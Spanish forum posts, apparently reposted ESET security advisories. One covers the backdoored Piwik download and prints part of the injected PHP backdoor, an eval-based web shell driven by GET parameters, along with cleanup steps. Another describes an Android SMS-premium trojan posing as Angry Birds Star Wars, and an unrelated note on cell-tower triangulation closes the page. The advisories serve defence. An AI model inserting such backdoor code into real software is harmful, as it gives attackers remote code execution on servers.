Luego del compromiso, el archivo descargable se mantuvo con la modificación del código malicioso durante algunas horas, por lo que los usuarios que hayan descargado el software durante ese período obtuvieron una versión maliciosa del mismo. Específicamente, el archivo modificado fue Loader.php ubicado dentro de la carpeta piwik/core/. A continuación se adjunta parte del código malicioso:

<?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKat

Según información del propio You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, el código malicioso insertado corresponde a un backdoor que permitiría al atacante ejecutar cualquier función válida que pueda ejecutarse mediante eval().

En el caso de que se haya instalado la versión modificada es recomendable seguir los siguientes pasos para solucionar el problema:

• Realizar una copia de piwik/config/config.ini.php.
• Borrar el directorio completo de piwik/.
• Descargar la última versión de Piwik (el código malicioso ya fue removido).
• Descomprimir el archivo descargado y situarlo en el servidor.
• Copiar el archivo de configuración config.ini.php previamente respaldado en el directorio /piwik/config/.
• En esta instancia, Piwik debería ejecutarse correctamente con la configuración anterior.

Cabe destacar que ningún tipo de información correspondiente a los usuarios de este software ha sido extraída del servidor vulnerado debido a que el mismo no guarda información correspondiente a sus usuarios.

El compromiso de servidores web por parte de los ciberdelincuentes tiene distintas motivaciones. En este caso fue la modificación de parte del software disponible para infectar a aquellos usuarios que descargan el mismo.

Se recomienda a todos los usuarios que naveguen en la web estar en alerta, tener cuidado y revisar siempre sus descargas. Todo sistema puede ser vulnerado, incluso cuando menos lo pensamos.

Saludos!

Fuente: Laboratorios ESET

Los grandes avances en el desarrollo de los tecnologías móviles los ha convertido en dispositivos indispensables, no solamente para llevar a cabo las tareas diarias sean personales o laborales, sino también en pieza fundamental para el ocio. Una de las últimas aplicaciones que ha tenido gran acogida entre los usuarios de juegos en dispositivos móviles es una nueva versión de Angry Birds esta vez ambientada en el universo de Star Wars. Y es precisamente esta popularidad la que la ha convertido en blanco de los desarrolladores de códigos maliciosos.

En este caso se ha desarrollado una aplicación maliciosa haciendo creer al usuario que se trata de una versión completa y no paga del popular juego, la cual se puede descargar de algunos repositorios no oficiales de aplicaciones para dispositivos Android,  como un archivo apk y que se puede instalar directamente en el celular. Una vez que se ha instalado la aplicación el dispositivo empieza a enviar mensajes de texto a números SMS Premium, lo cual implica una pérdida económica para el usuario y que en última podría llegar a sobrepasar el costo de la aplicación oficial.

Particularmente este código malicioso es detectado como el ya conocido Troyano SMS. Un análisis de este código malicioso, deja ver en el AndroidManifest.xml los permisos que está requiriendo. En este punto se resalta obviamente el envío de mensajes SMS. Lo importante que deben tener claro los usuarios sobre este tipo de suscripciones es que una vez que el usuario acepta la instalación está aprobando una serie de condiciones en las cuales asume la responsabilidad de todo gasto en el que pueda incurrir. Además dentro del código hay una porción para compatibilizar esta amenaza con la versión 4.0 de Android.


El gran problema con este tipo de malware es que le generan una pérdida económica a la víctima, quien descubre que está infectado una vez que se le agota su saldo o le llega la factura de cobro. Por tal motivo la primera alternativa que debe tener un usuario es contar con una solución de seguridad que le ayude a identificar si su smartphone está infectado con este tipo de código malicioso o con algún otro que pueda poner en riesgo la seguridad de su información.

Cabe resaltar el cuidado que deben tener los usuarios al descargar aplicaciones de repositorios no oficiales, pues los controles para determinar si están relacionados con códigos maliciosos no son tan estrictos cómo en el caso de los repositorios oficiales que en el caso de Android es Google Play. Vale la pena mencionar que la versión 4.2 del sistema operativo móvil de Google, traerá incorporado una nueva característica de seguridad que le preguntará al usuario sobre si está de acuerdo en instalar una aplicación que acceda a recursos sensibles o funciones que pueden significar un costo para el usuario.

Saludos!

Fuente: Laboratorios ESET
Agradecimientos: H. Camilo Gutiérrez Amaya

Para los rastreos de celulares de la generación anterior el método que mas he visto usarse es la triangulación. Este proceso basa en mandar un paquete a las tres antenas mas cercanas. De esta manera, se mide la tardanza a cada una de las antenas y luego de una ecuación se podría deducir la ubicación exacta que hay entre el telefono y las tres antenas.

Si estás interesado en celulares de ultima generación, lo cual seguramente sea así, lo mejor es seguir los consejos que te dio mi compañero anteriormente.

Saludos!